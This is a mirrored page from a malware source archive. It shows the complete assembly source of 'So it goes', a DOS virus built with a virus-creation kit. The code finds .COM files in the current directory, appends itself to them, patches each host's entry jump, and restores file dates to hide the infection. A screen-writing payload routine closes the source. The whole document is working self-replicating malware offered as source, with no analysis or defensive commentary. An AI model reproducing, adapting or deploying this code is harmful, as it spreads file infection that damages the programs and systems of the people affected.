mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-18 17:36:11 +00:00
191 lines
5.3 KiB
NASM
191 lines
5.3 KiB
NASM
; soitgoes.asm : [So it goes.]
|
|
; Created with Biological Warfare - Version 0.90á by MnemoniX
|
|
|
|
PING equ 0AC3Ch
|
|
INFECT equ 1
|
|
|
|
code segment
|
|
org 100h
|
|
assume cs:code,ds:code
|
|
|
|
start:
|
|
db 0E9h,3,0 ; to virus
|
|
host:
|
|
db 0CDh,20h,0 ; host program
|
|
virus_begin:
|
|
push ds es
|
|
|
|
call $ + 3 ; BP is instruction ptr.
|
|
pop bp
|
|
sub bp,offset $ - 1
|
|
|
|
lea dx,[bp + offset new_DTA]
|
|
mov ah,1Ah
|
|
int 21h
|
|
|
|
mov byte ptr [bp + infections],0
|
|
|
|
call infect_dir
|
|
|
|
call activate
|
|
|
|
pop es ds
|
|
mov dx,80h
|
|
mov ah,1Ah
|
|
int 21h
|
|
|
|
com_exit:
|
|
lea si,[bp + host] ; restore host program
|
|
mov di,100h
|
|
push di
|
|
movsw
|
|
movsb
|
|
|
|
call fix_regs ; fix up registers
|
|
ret ; and leave
|
|
|
|
fix_regs:
|
|
xor ax,ax
|
|
cwd
|
|
xor bx,bx
|
|
mov si,100h
|
|
xor di,di
|
|
xor bp,bp
|
|
ret
|
|
|
|
|
|
infect_dir:
|
|
mov ah,4Eh
|
|
lea dx,[bp + find_me]
|
|
int 21h
|
|
jc infect_done
|
|
|
|
next_file:
|
|
lea dx,[bp + new_DTA + 1Eh]
|
|
call execute
|
|
cmp byte ptr [bp + infections],INFECT
|
|
je infect_done
|
|
mov ah,4Fh
|
|
int 21h
|
|
jnc next_file
|
|
|
|
infect_done:
|
|
ret
|
|
execute:
|
|
push si
|
|
|
|
mov ax,4300h ; change attributes
|
|
int 21h
|
|
|
|
push cx dx ds
|
|
xor cx,cx
|
|
call set_attributes
|
|
|
|
mov ax,3D02h ; open file
|
|
int 21h
|
|
jc cant_open
|
|
xchg bx,ax
|
|
|
|
mov ax,5700h ; save file date/time
|
|
int 21h
|
|
push cx dx
|
|
mov ah,3Fh
|
|
mov cx,28
|
|
lea dx,[bp + read_buffer]
|
|
int 21h
|
|
|
|
cmp word ptr [bp + read_buffer],'ZM'
|
|
je dont_infect ; .EXE, skip
|
|
|
|
mov al,2 ; move to end of file
|
|
call move_file_ptr
|
|
|
|
sub dx,VIRUS_SIZE + 3 ; check for previous infection
|
|
cmp dx,word ptr [bp + read_buffer + 1]
|
|
je dont_infect
|
|
|
|
add dx,VIRUS_SIZE + 3
|
|
mov word ptr [bp + new_jump + 1],dx
|
|
|
|
lea dx,[bp + read_buffer] ; save original program head
|
|
int 21h
|
|
|
|
mov ah,40h ; write virus to file
|
|
mov cx,VIRUS_SIZE
|
|
lea dx,[bp + virus_begin]
|
|
int 21h
|
|
|
|
xor al,al ; back to beginning of file
|
|
call move_file_ptr
|
|
|
|
lea dx,[bp + new_jump]
|
|
int 21h
|
|
|
|
fix_date_time:
|
|
pop dx cx
|
|
mov ax,5701h ; restore file date/time
|
|
int 21h
|
|
|
|
inc byte ptr [bp + infections]
|
|
|
|
close:
|
|
pop ds dx cx ; restore attributes
|
|
call set_attributes
|
|
|
|
mov ah,3Eh ; close file
|
|
int 21h
|
|
|
|
cant_open:
|
|
pop si
|
|
ret
|
|
|
|
|
|
set_attributes:
|
|
mov ax,4301h
|
|
int 21h
|
|
ret
|
|
|
|
dont_infect:
|
|
pop cx dx ; can't infect, skip
|
|
jmp close
|
|
|
|
move_file_ptr:
|
|
mov ah,42h ; move file pointer
|
|
cwd
|
|
xor cx,cx
|
|
int 21h
|
|
|
|
mov dx,ax ; set up registers
|
|
mov ah,40h
|
|
mov cx,3
|
|
ret
|
|
|
|
activate: ; Insert your routine here
|
|
MOV CX,03h
|
|
MOV AH,09h
|
|
MOV BH,00h
|
|
MOV CX,03h
|
|
MOV AL,00h
|
|
MOV BL,23
|
|
INT 10h
|
|
ret
|
|
|
|
signature db '[So it goes.]',0
|
|
|
|
|
|
find_me db '*.COM',0
|
|
new_jump db 0E9h,0,0
|
|
|
|
infections db 0
|
|
virus_end:
|
|
VIRUS_SIZE equ virus_end - virus_begin
|
|
read_buffer db 28 dup (?) ; read buffer
|
|
new_DTA db 128 dup(?)
|
|
|
|
end_heap:
|
|
|
|
MEM_SIZE equ end_heap - start
|
|
|
|
code ends
|
|
end start
|